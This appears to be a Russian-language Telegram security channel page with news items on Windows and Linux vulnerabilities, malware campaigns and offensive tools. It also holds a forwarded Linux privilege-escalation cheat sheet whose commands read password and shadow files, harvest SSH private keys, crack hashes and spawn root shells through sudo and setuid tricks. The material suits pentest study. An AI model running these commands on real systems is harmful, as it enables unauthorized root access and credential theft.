Похек
16.7K subscribers
2.23K photos
115 videos
243 files
3.16K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Windows Kerberos KerbRetrieveEncodedTicketMessage AppContainer Privilege Escalation
On Windows 11, the Kerberos SSP's KerbRetrieveEncodedTicketMessage message can be used to get an arbitrary service ticket and session key from an AppContainer even without the enterprise authentication capability leading to elevation of privilege.
▶️ Источник

Дневник Безопасника 🛡
👍1
Sneaky Orbit Malware Backdoors Linux Devices
The novel threat steals data and can affect all processes running on the OS, stealing information from different commands and utilities and then storing it on the affected machine.
▶️ Источник

Дневник Безопасника 🛡
👍1
Hackers Exploiting Follina Bug to Deploy Rozena Backdoor
A newly observed phishing campaign is leveraging the recently disclosed Follina security vulnerability to distribute a previously undocumented backdoor on Windows systems.
▶️ Источник

Дневник Безопасника 🛡
👍1
RCE Vulnerability In UnRAR Library Affected Zimbra Platform
A severe remote code execution vulnerability affected the Zimbra email client. The bug typically existed in the UnRAR library that could trigger RCE on the Zimbra platform. Thankfully, the bug received a fix before malicious exploitation.
▶️ Источник

Дневник Безопасника 🛡
👍1
Pamspy - Credentials Dumper For Linux Using eBPF
pamspy leverage eBPF technologies to achieve an equivalent work of 3snake.
▶️ Источник

Дневник Безопасника 🛡
👍1
cve-2022-29455 elementor wordpress plugin xss exploit
While searching for known bugs in Elementor we saw an interesting bug (CVE-2021-24891) that was raised in the past which uses a DOM-XSS to attack a user logged in to the system. Because we already have some knowledge in Javascript and had fun with DOM-XSS together in the past, we decided to deep dive into this CVE.
https://github.com/alirezasalehizadeh/cve-2022-29455

Дневник Безопасника 🛡
👍1
PackMyPayload - Emerging Threat of Containerized Malware
This tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.
https://github.com/mgeeky/PackMyPayload

Дневник Безопасника 🛡
👍1
Forwarded from Monkey Hacker
#linux

Linux Privilege Escalation Cheat Sheet 🗞

🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
👍1
Похищаем сохраненный в Chrome пароль с помощью XSS 

В этой статье я расскажу о том, как с помощью XSS-атаки в сочетании с ClickJacking’ом злоумышленники могут похитить сохраненные в браузере пароли.
👍1😱1
Операторы LockBit используют Windows Defender для загрузки Cobalt Strike

Операторы вредоносной программы LockBit версии 3.0 используют командную строку антивирусной программы Windows Defender для загрузки «маячков» Cobalt Strike на скомпрометированные системы и обхода защитных средств.
3👍1
ВТБ: в июне акивность мошенников возросла в 10 раз

В минувшем месяце специалисты ВТБ выявили около 7 тыс. мошеннических страниц, имитирующих банковские сайты. Этот показатель почти в 10 раз выше майского и в 2,5 раза — суммарного за период с января по май.
👍1
Новый ботнет-рэпер для Linux брутфорсит SSH-серверы

Обнаруженный на днях ботнет “RapperBot” с середины июня 2022 года проводит брутфорс-атаки на SSH-серверы Linux. За основу авторы вредоноса взяли троян Mirai, изменив ряд его особенностей (например, бесконтрольное распространение на максимально доступное число устройств).
👍1